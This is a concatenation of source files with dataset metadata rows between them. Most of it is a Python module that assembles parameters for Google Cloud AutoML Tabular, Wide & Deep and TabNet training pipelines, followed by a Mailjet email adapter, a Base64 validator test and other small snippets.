dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
    Tuple of pipeline_definition_path and parameter_values.
"""
if stage_2_num_parallel_trials <= 0:
stage_2_num_parallel_trials = _DEFAULT_NUM_PARALLEL_TRAILS
stage_2_deadline_hours = train_budget_milli_node_hours / 1000.0
stage_2_single_run_max_secs = int(stage_2_deadline_hours * 3600.0 / 1.3)
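  # Worked example (editor's note, not part of the original module): with
  # train_budget_milli_node_hours=1000, stage_2_deadline_hours = 1.0 and
  # stage_2_single_run_max_secs = int(3600 / 1.3) = 2769; the 1.3 safety
  # margin mirrors the one used in the full pipeline above.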
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column_name':
target_column_name,
'prediction_type':
prediction_type,
'optimization_objective':
optimization_objective,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'stage_1_tuning_result_artifact_uri':
stage_1_tuning_result_artifact_uri,
'stage_2_deadline_hours':
stage_2_deadline_hours,
'stage_2_num_parallel_trials':
stage_2_num_parallel_trials,
'stage_2_num_selected_trials':
stage_2_num_selected_trials,
'stage_2_single_run_max_secs':
stage_2_single_run_max_secs,
'weight_column_name':
weight_column_name,
'optimization_objective_recall_value':
optimization_objective_recall_value,
'optimization_objective_precision_value':
optimization_objective_precision_value,
'cv_trainer_worker_pool_specs_override':
input_dictionary_to_parameter(cv_trainer_worker_pool_specs_override),
'export_additional_model_without_custom_ops':
export_additional_model_without_custom_ops,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
}
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'skip_architecture_search_pipeline.json')
return pipeline_definition_path, parameter_values
def get_distill_skip_evaluation_pipeline_and_parameters(
*args,
distill_batch_predict_machine_type: str = 'n1-standard-16',
distill_batch_predict_starting_replica_count: int = 25,
distill_batch_predict_max_replica_count: int = 25,
**kwargs) -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular training pipeline that distill and skips evaluation.
Args:
*args: All arguments in `get_skip_evaluation_pipeline_and_parameters`.
distill_batch_predict_machine_type: The prediction server machine type for
batch predict component in the model distillation.
distill_batch_predict_starting_replica_count: The initial number of
prediction server for batch predict component in the model distillation.
distill_batch_predict_max_replica_count: The max number of prediction server
for batch predict component in the model distillation.
**kwargs: All arguments in `get_skip_evaluation_pipeline_and_parameters`.
Returns:
    Tuple of pipeline_definition_path and parameter_values.
"""
_, parameter_values = get_skip_evaluation_pipeline_and_parameters(
*args, **kwargs)
  # The magic number 1.3 below is used because a trial doesn't always finish
  # within time_per_trial; 1.3 is an empirical safety margin.
distill_stage_1_deadline_hours = math.ceil(
float(_DISTILL_TOTAL_TRIALS) /
parameter_values['stage_1_num_parallel_trials']
) * parameter_values['stage_1_single_run_max_secs'] * 1.3 / 3600.0
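  # Worked example (editor's note, not part of the original module): with the
  # defaults above (35 stage-1 parallel trials and a 1,000 milli-node-hour
  # budget giving stage_1_single_run_max_secs == 635), this is
  #   ceil(100 / 35) * 635 * 1.3 / 3600 = 3 * 635 * 1.3 / 3600 ~= 0.69 hours.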
parameter_values.update({
'distill_stage_1_deadline_hours':
distill_stage_1_deadline_hours,
'distill_batch_predict_machine_type':
distill_batch_predict_machine_type,
'distill_batch_predict_starting_replica_count':
distill_batch_predict_starting_replica_count,
'distill_batch_predict_max_replica_count':
distill_batch_predict_max_replica_count,
})
  pipeline_definition_path = os.path.join(
      pathlib.Path(__file__).parent.resolve(),
      'distill_skip_evaluation_pipeline.json')
  return pipeline_definition_path, parameter_values
def get_wide_and_deep_trainer_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column: str,
prediction_type: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
learning_rate: float,
dnn_learning_rate: float,
optimizer_type: str = 'adam',
max_steps: int = -1,
max_train_secs: int = -1,
l1_regularization_strength: float = 0,
l2_regularization_strength: float = 0,
l2_shrinkage_regularization_strength: float = 0,
beta_1: float = 0.9,
beta_2: float = 0.999,
hidden_units: str = '30,30,30',
use_wide: bool = True,
embed_categories: bool = True,
dnn_dropout: float = 0,
dnn_optimizer_type: str = 'ftrl',
dnn_l1_regularization_strength: float = 0,
dnn_l2_regularization_strength: float = 0,
dnn_l2_shrinkage_regularization_strength: float = 0,
dnn_beta_1: float = 0.9,
dnn_beta_2: float = 0.999,
enable_profiler: bool = False,
seed: int = 1,
eval_steps: int = 0,
batch_size: int = 100,
eval_frequency_secs: int = 600,
weight_column: str = '',
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
training_machine_spec: Optional[Dict[str, Any]] = None,
training_replica_count: int = 1,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the Wide & Deep training pipeline.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column: The target column name.
prediction_type: The type of prediction the model is to produce.
'classification' or 'regression'.
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
learning_rate: The learning rate used by the linear optimizer.
dnn_learning_rate: The learning rate for training the deep part of the
model.
optimizer_type: The type of optimizer to use. Choices are "adam", "ftrl" and
"sgd" for the Adam, FTRL, and Gradient Descent Optimizers, respectively.
max_steps: Number of steps to run the trainer for.
max_train_secs: Amount of time in seconds to run the trainer for.
l1_regularization_strength: L1 regularization strength for
optimizer_type="ftrl".
l2_regularization_strength: L2 regularization strength for
optimizer_type="ftrl".
l2_shrinkage_regularization_strength: L2 shrinkage regularization strength
for optimizer_type="ftrl".
beta_1: Beta 1 value for optimizer_type="adam".
beta_2: Beta 2 value for optimizer_type="adam".
hidden_units: Hidden layer sizes to use for DNN feature columns, provided in
comma-separated layers.
use_wide: If set to true, the categorical columns will be used in the wide
part of the DNN model.
    embed_categories: If set to true, the categorical columns will be
      embedded and used in the deep part of the model. Embedding size is the
square root of the column cardinality.
dnn_dropout: The probability we will drop out a given coordinate.
dnn_optimizer_type: The type of optimizer to use for the deep part of the
model. Choices are "adam", "ftrl" and "sgd". for the Adam, FTRL, and
Gradient Descent Optimizers, respectively.
dnn_l1_regularization_strength: L1 regularization strength for
dnn_optimizer_type="ftrl".
dnn_l2_regularization_strength: L2 regularization strength for
dnn_optimizer_type="ftrl".
dnn_l2_shrinkage_regularization_strength: L2 shrinkage regularization
strength for dnn_optimizer_type="ftrl".
dnn_beta_1: Beta 1 value for dnn_optimizer_type="adam".
dnn_beta_2: Beta 2 value for dnn_optimizer_type="adam".
enable_profiler: Enables profiling and saves a trace during evaluation.
seed: Seed to be used for this run.
eval_steps: Number of steps to run evaluation for. If not specified or
negative, it means run evaluation on the whole validation dataset. If set
to 0, it means run evaluation for a fixed number of samples.
batch_size: Batch size for training.
eval_frequency_secs: Frequency at which evaluation and checkpointing will
take place.
weight_column: The weight column name.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
training_machine_spec: The machine spec for trainer component. See
https://cloud.google.com/compute/docs/machine-types for options.
training_replica_count: The replica count for the trainer component.
dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
    Tuple of pipeline_definition_path and parameter_values.
"""
if not training_machine_spec:
training_machine_spec = {'machine_type': 'n1-standard-16'}
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column':
target_column,
'prediction_type':
prediction_type,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'learning_rate':
learning_rate,
'dnn_learning_rate':
dnn_learning_rate,
'optimizer_type':
optimizer_type,
'max_steps':
max_steps,
'max_train_secs':
max_train_secs,
'l1_regularization_strength':
l1_regularization_strength,
'l2_regularization_strength':
l2_regularization_strength,
'l2_shrinkage_regularization_strength':
l2_shrinkage_regularization_strength,
'beta_1':
beta_1,
'beta_2':
beta_2,
'hidden_units':
hidden_units,
'use_wide':
use_wide,
'embed_categories':
embed_categories,
'dnn_dropout':
dnn_dropout,
'dnn_optimizer_type':
dnn_optimizer_type,
'dnn_l1_regularization_strength':
dnn_l1_regularization_strength,
'dnn_l2_regularization_strength':
dnn_l2_regularization_strength,
'dnn_l2_shrinkage_regularization_strength':
dnn_l2_shrinkage_regularization_strength,
'dnn_beta_1':
dnn_beta_1,
'dnn_beta_2':
dnn_beta_2,
'enable_profiler':
enable_profiler,
'seed':
seed,
'eval_steps':
eval_steps,
'batch_size':
batch_size,
'eval_frequency_secs':
eval_frequency_secs,
'weight_column':
weight_column,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'stats_and_example_gen_dataflow_disk_size_gb':
stats_and_example_gen_dataflow_disk_size_gb,
'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'transform_dataflow_disk_size_gb':
transform_dataflow_disk_size_gb,
'training_machine_spec':
training_machine_spec,
'training_replica_count':
training_replica_count,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
}
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'wide_and_deep_trainer_pipeline.json')
return pipeline_definition_path, parameter_values
def get_builtin_algorithm_hyperparameter_tuning_job_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column: str,
prediction_type: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
study_spec_metrics: List[Dict[str, Any]],
study_spec_parameters: List[Dict[str, Any]],
max_trial_count: int,
parallel_trial_count: int,
algorithm: str,
enable_profiler: bool = False,
seed: int = 1,
eval_steps: int = 0,
eval_frequency_secs: int = 600,
weight_column: str = '',
max_failed_trial_count: int = 0,
study_spec_algorithm: str = 'ALGORITHM_UNSPECIFIED',
study_spec_measurement_selection_type: str = 'BEST_MEASUREMENT',
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
training_machine_spec: Optional[Dict[str, Any]] = None,
training_replica_count: int = 1,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the built-in algorithm HyperparameterTuningJob pipeline.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
    study_spec_metrics: List of dictionaries representing metrics to optimize.
      Each dictionary contains the metric_id, which is reported by the training
      job, and the optimization goal of the metric, one of "minimize" or
      "maximize".
    study_spec_parameters: List of dictionaries representing parameters to
      optimize. The dictionary key is the parameter_id, which is passed to the
      training job as a command line argument, and the dictionary value is the
      parameter specification for that parameter.
max_trial_count: The desired total number of trials.
parallel_trial_count: The desired number of trials to run in parallel.
algorithm: Algorithm to train. One of "tabnet" and "wide_and_deep".
enable_profiler: Enables profiling and saves a trace during evaluation.
seed: Seed to be used for this run.
    eval_steps: Number of steps to run evaluation for. If not specified or
      negative, evaluation runs on the whole validation dataset. If set to 0,
      evaluation runs for a fixed number of samples.
eval_frequency_secs: Frequency at which evaluation and checkpointing will
take place.
weight_column: The weight column name.
max_failed_trial_count: The number of failed trials that need to be seen
before failing the HyperparameterTuningJob. If set to 0, Vertex AI decides
how many trials must fail before the whole job fails.
study_spec_algorithm: The search algorithm specified for the study. One of
"ALGORITHM_UNSPECIFIED", "GRID_SEARCH", or "RANDOM_SEARCH".
study_spec_measurement_selection_type: Which measurement to use if/when the
service automatically selects the final measurement from previously
reported intermediate measurements. One of "BEST_MEASUREMENT" or
"LAST_MEASUREMENT".
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
training_machine_spec: The machine spec for trainer component. See
https://cloud.google.com/compute/docs/machine-types for options.
training_replica_count: The replica count for the trainer component.
    dataflow_subnetwork: Dataflow's fully qualified subnetwork name. When empty,
      the default subnetwork will be used. Example:
      https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
    Tuple of pipeline_definition_path and parameter_values.
"""
if not training_machine_spec:
training_machine_spec = {'machine_type': 'n1-standard-16'}
if algorithm not in ['tabnet', 'wide_and_deep']:
raise ValueError(
'Invalid algorithm provided. Supported values are "tabnet" and "wide_and_deep".'
)
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column':
target_column,
'prediction_type':
prediction_type,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'study_spec_metrics':
study_spec_metrics,
'study_spec_parameters':
study_spec_parameters,
'max_trial_count':
max_trial_count,
'parallel_trial_count':
parallel_trial_count,
'enable_profiler':
enable_profiler,
'seed':
seed,
'eval_steps':
eval_steps,
'eval_frequency_secs':
eval_frequency_secs,
'weight_column':
weight_column,
'max_failed_trial_count':
max_failed_trial_count,
'study_spec_algorithm':
study_spec_algorithm,
'study_spec_measurement_selection_type':
study_spec_measurement_selection_type,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'stats_and_example_gen_dataflow_disk_size_gb':
stats_and_example_gen_dataflow_disk_size_gb,
'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'transform_dataflow_disk_size_gb':
transform_dataflow_disk_size_gb,
'training_machine_spec':
training_machine_spec,
'training_replica_count':
training_replica_count,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
}
if algorithm == 'tabnet':
parameter_values['tabnet'] = True
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'tabnet_hyperparameter_tuning_job_pipeline.json')
if algorithm == 'wide_and_deep':
parameter_values['wide_and_deep'] = True
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'wide_and_deep_hyperparameter_tuning_job_pipeline.json')
return pipeline_definition_path, parameter_values
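# --- Hedged illustration (editor's addition, not part of the original module). ---
# The study_spec_metrics / study_spec_parameters arguments documented above are plain
# dictionaries. The shapes below mirror the Vertex AI StudySpec JSON and are an
# assumption based on the public hyperparameter tuning API, not something defined in
# this file; the metric and parameter names are placeholders.
EXAMPLE_STUDY_SPEC_METRICS = [
    {'metric_id': 'loss', 'goal': 'MINIMIZE'},
]
EXAMPLE_STUDY_SPEC_PARAMETERS = [
    {
        'parameter_id': 'learning_rate',
        'double_value_spec': {'min_value': 1e-4, 'max_value': 1e-1},
        'scale_type': 'UNIT_LOG_SCALE',
    },
]
# These lists would be passed as study_spec_metrics / study_spec_parameters to
# get_builtin_algorithm_hyperparameter_tuning_job_pipeline_and_parameters, alongside
# the usual project / location / root_dir / data_source arguments described in the
# Args section above.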
def get_tabnet_trainer_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column: str,
prediction_type: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
learning_rate: float,
max_steps: int = -1,
max_train_secs: int = -1,
large_category_dim: int = 1,
large_category_thresh: int = 300,
yeo_johnson_transform: bool = True,
feature_dim: int = 64,
feature_dim_ratio: float = 0.5,
num_decision_steps: int = 6,
relaxation_factor: float = 1.5,
decay_every: float = 100,
gradient_thresh: float = 2000,
sparsity_loss_weight: float = 0.00001,
batch_momentum: float = 0.95,
batch_size_ratio: float = 0.25,
num_transformer_layers: int = 4,
num_transformer_layers_ratio: float = 0.25,
class_weight: float = 1.0,
loss_function_type: str = 'default',
alpha_focal_loss: float = 0.25,
gamma_focal_loss: float = 2.0,
enable_profiler: bool = False,
seed: int = 1,
eval_steps: int = 0,
batch_size: int = 100,
eval_frequency_secs: int = 600,
weight_column: str = '',
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
training_machine_spec: Optional[Dict[str, Any]] = None,
training_replica_count: int = 1,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the TabNet training pipeline.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
learning_rate: The learning rate used by the linear optimizer.
max_steps: Number of steps to run the trainer for.
max_train_secs: Amount of time in seconds to run the trainer for.
large_category_dim: Embedding dimension for categorical feature with large
number of categories.
large_category_thresh: Threshold for number of categories to apply
large_category_dim embedding dimension to.
yeo_johnson_transform: Enables trainable Yeo-Johnson power transform.
feature_dim: Dimensionality of the hidden representation in feature
transformation block.
feature_dim_ratio: The ratio of output dimension (dimensionality of the
outputs of each decision step) to feature dimension.
num_decision_steps: Number of sequential decision steps.
relaxation_factor: Relaxation factor that promotes the reuse of each feature
at different decision steps. When it is 1, a feature is enforced to be
used only at one decision step and as it increases, more flexibility is
provided to use a feature at multiple decision steps.
    decay_every: Number of iterations for periodically applying learning rate
      decay.
gradient_thresh: Threshold for the norm of gradients for clipping.
sparsity_loss_weight: Weight of the loss for sparsity regularization
(increasing it will yield more sparse feature selection).
batch_momentum: Momentum in ghost batch normalization.
batch_size_ratio: The ratio of virtual batch size (size of the ghost batch
normalization) to batch size.
    num_transformer_layers: The number of transformer layers for each decision
      step.
    num_transformer_layers_ratio: The ratio of shared transformer layers to
      transformer layers.
    class_weight: The class weight is used to compute a weighted cross entropy,
      which is helpful for classifying imbalanced datasets. Only used for
      classification.
    loss_function_type: Loss function type. For classification, one of
      [cross_entropy, weighted_cross_entropy, focal_loss]; default is
      cross_entropy. For regression, one of [rmse, mae, mse]; default is mse.
    alpha_focal_loss: Alpha value (balancing factor) in focal_loss function.
      Only used for classification.
    gamma_focal_loss: Gamma value (modulating factor) in the focal loss
      function. Only used for classification.
enable_profiler: Enables profiling and saves a trace during evaluation.
seed: Seed to be used for this run.
    eval_steps: Number of steps to run evaluation for. If not specified or
      negative, evaluation runs on the whole validation dataset. If set to 0,
      evaluation runs for a fixed number of samples.
batch_size: Batch size for training.
eval_frequency_secs: Frequency at which evaluation and checkpointing will
take place.
weight_column: The weight column name.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
training_machine_spec: The machine spec for trainer component. See
https://cloud.google.com/compute/docs/machine-types for options.
training_replica_count: The replica count for the trainer component.
    dataflow_subnetwork: Dataflow's fully qualified subnetwork name. When empty,
      the default subnetwork will be used. Example:
      https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
    Tuple of pipeline_definition_path and parameter_values.
"""
if not training_machine_spec:
training_machine_spec = {'machine_type': 'n1-standard-16'}
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column':
target_column,
'prediction_type':
prediction_type,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'learning_rate':
learning_rate,
'max_steps':
max_steps,
'max_train_secs':
max_train_secs,
'large_category_dim':
large_category_dim,
'large_category_thresh':
large_category_thresh,
'yeo_johnson_transform':
yeo_johnson_transform,
'feature_dim':
feature_dim,
'feature_dim_ratio':
feature_dim_ratio,
'num_decision_steps':
num_decision_steps,
'relaxation_factor':
relaxation_factor,
'decay_every':
decay_every,
'gradient_thresh':
gradient_thresh,
'sparsity_loss_weight':
sparsity_loss_weight,
'batch_momentum':
batch_momentum,
'batch_size_ratio':
batch_size_ratio,
'num_transformer_layers':
num_transformer_layers,
'num_transformer_layers_ratio':
num_transformer_layers_ratio,
'class_weight':
class_weight,
'loss_function_type':
loss_function_type,
'alpha_focal_loss':
alpha_focal_loss,
'gamma_focal_loss':
gamma_focal_loss,
'enable_profiler':
enable_profiler,
'seed':
seed,
'eval_steps':
eval_steps,
'batch_size':
batch_size,
'eval_frequency_secs':
eval_frequency_secs,
'weight_column':
weight_column,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'stats_and_example_gen_dataflow_disk_size_gb':
stats_and_example_gen_dataflow_disk_size_gb,
'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'transform_dataflow_disk_size_gb':
transform_dataflow_disk_size_gb,
'training_machine_spec':
training_machine_spec,
'training_replica_count':
training_replica_count,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
}
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(), 'tabnet_trainer_pipeline.json')
return pipeline_definition_path, parameter_values
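# --- Hedged usage sketch (editor's addition, not part of the original module). ---
# It shows one plausible way to submit the (template_path, parameter_values) pair
# returned above with the Vertex AI SDK. `google.cloud.aiplatform.PipelineJob` is the
# usual entry point for compiled pipeline templates, but that choice, the project,
# region and bucket names, and the transformation/split/data-source dicts are all
# placeholders or assumptions, not values defined in this module.
def _example_tabnet_trainer_submission():  # pragma: no cover
    from google.cloud import aiplatform

    template_path, parameter_values = get_tabnet_trainer_pipeline_and_parameters(
        project='my-gcp-project',                                   # placeholder
        location='us-central1',
        root_dir='gs://my-bucket/pipeline_root',                    # placeholder bucket
        target_column='label',
        prediction_type='classification',
        transformations={'auto': [{'column_name': 'feature_1'}]},   # illustrative shape
        split_spec={'fraction_split': {'training_fraction': 0.8,
                                       'validation_fraction': 0.1,
                                       'test_fraction': 0.1}},      # illustrative shape
        data_source={'csv_data_source': {
            'csv_filenames': ['gs://my-bucket/train.csv']}},        # illustrative shape
        learning_rate=0.01)

    aiplatform.init(project='my-gcp-project', location='us-central1')
    job = aiplatform.PipelineJob(
        display_name='tabnet-trainer',
        template_path=template_path,
        pipeline_root='gs://my-bucket/pipeline_root',
        parameter_values=parameter_values)
    job.run()  # blocks until the pipeline finishes; job.submit() returns immediately
    return job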
| 44.046404
| 149
| 0.74317
|
fd390eec24009528885bb2eab5726f94759bf1b2
| 1,467
|
py
|
Python
|
app/core/adapters/mailjet.py
|
umluizlima/email-sender
|
d952874918fc6edc896dabe6d1c1e1391f9d8697
|
[
"MIT"
] | 7
|
2020-05-24T16:49:05.000Z
|
2021-05-03T18:50:00.000Z
|
app/core/adapters/mailjet.py
|
umluizlima/email-sender
|
d952874918fc6edc896dabe6d1c1e1391f9d8697
|
[
"MIT"
] | 1
|
2021-11-07T18:52:54.000Z
|
2021-11-07T18:52:55.000Z
|
app/core/adapters/mailjet.py
|
umluizlima/email-sender
|
d952874918fc6edc896dabe6d1c1e1391f9d8697
|
[
"MIT"
] | 2
|
2020-05-24T16:49:07.000Z
|
2022-02-03T00:57:25.000Z
|
from typing import Dict
from mailjet_rest import Client
from ..schemas import EmailSchema
from .base import BaseAdapter
class MailjetAdapter(BaseAdapter):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.client = Client(
auth=(
self.settings.MAILJET_API_KEY.get_secret_value(),
self.settings.MAILJET_API_SECRET.get_secret_value(),
),
version="v3.1",
)
def send(self, message: EmailSchema):
try:
self.client.send.create(data=self._prepare_message(message))
except Exception as error:
raise Exception(f"Error sending {message}", error)
def _prepare_message(self, message: EmailSchema) -> Dict:
return {
"Messages": [
{
"From": {
"Email": message.from_email
or self.settings.DEFAULT_EMAIL_ADDRESS
},
"To": [{"Email": message.to_email}],
"Subject": message.subject,
MailjetAdapter._get_content_attribute(
message.content_type
): message.content,
}
]
}
@staticmethod
def _get_content_attribute(content_type: str) -> str:
if content_type == "text/plain":
return "TextPart"
else:
return "HTMLPart"
| 29.938776
| 72
| 0.528971
|
3d90d7c98e3fb50149c77eb002567f870cf11977
| 122
|
py
|
Python
|
src/interpret.py
|
BotScutters/eye-of-the-needle
|
586d9c1e33763919b70382e67e4c7873bdbb05a8
|
[
"MIT"
] | 16
|
2019-04-08T22:09:51.000Z
|
2021-08-02T18:18:41.000Z
|
src/interpret.py
|
BotScutters/eye-of-the-needle
|
586d9c1e33763919b70382e67e4c7873bdbb05a8
|
[
"MIT"
] | 1
|
2019-11-19T06:27:37.000Z
|
2019-12-26T20:56:03.000Z
|
src/interpret.py
|
BotScutters/eye-of-the-needle
|
586d9c1e33763919b70382e67e4c7873bdbb05a8
|
[
"MIT"
] | 8
|
2019-04-08T23:01:39.000Z
|
2021-08-02T18:18:43.000Z
|
def run():
print("iNterpret: calculating performance metrics...")
print("iNterpret: generating final reports...")
| 30.5
| 58
| 0.696721
|
4d839981f24284a1b73710787dcc985d29b11e4f
| 538
|
py
|
Python
|
tests/rules/test_base64.py
|
Varun-22/Validator
|
2c5caa9323aef35e2796813a357e5a7d6d4a80ba
|
[
"MIT"
] | 41
|
2020-05-07T15:35:12.000Z
|
2021-11-01T03:57:09.000Z
|
tests/rules/test_base64.py
|
Varun-22/Validator
|
2c5caa9323aef35e2796813a357e5a7d6d4a80ba
|
[
"MIT"
] | 83
|
2020-05-09T22:11:26.000Z
|
2022-03-10T19:06:46.000Z
|
tests/rules/test_base64.py
|
Varun-22/Validator
|
2c5caa9323aef35e2796813a357e5a7d6d4a80ba
|
[
"MIT"
] | 25
|
2020-05-27T22:46:01.000Z
|
2022-03-04T01:36:11.000Z
|
from validator.rules import Base64
def test_base64_01():
assert Base64().check("c2hPd1MgaSBMSWtFOg==")
assert Base64().check("U09VVEggUEFSSw==")
assert Base64().check("QkxBQ0sgTUlSUk9S")
assert Base64().check("RkFSR08=")
assert Base64().check("QnJlYUtJTkcgQmFkIA==")
def test_base64_02():
assert not Base64().check("hbsdf")
assert not Base64().check("!@#")
assert not Base64().check("bfjhsdf HGHG &^&&")
assert not Base64().check("29i03r09j....")
assert not Base64().check("olgak9999")
| 20.692308
| 50
| 0.66171
|
cedb0d32a51a1f575a622b38de2cee3ab4757821
| 2,365
|
py
|
Python
|
mmcv/parallel/data_container.py
|
BIGWangYuDong/mmcv
|
c46deb0576edaff5cd5a7d384c617478c7a73a70
|
[
"Apache-2.0"
] | 3,748
|
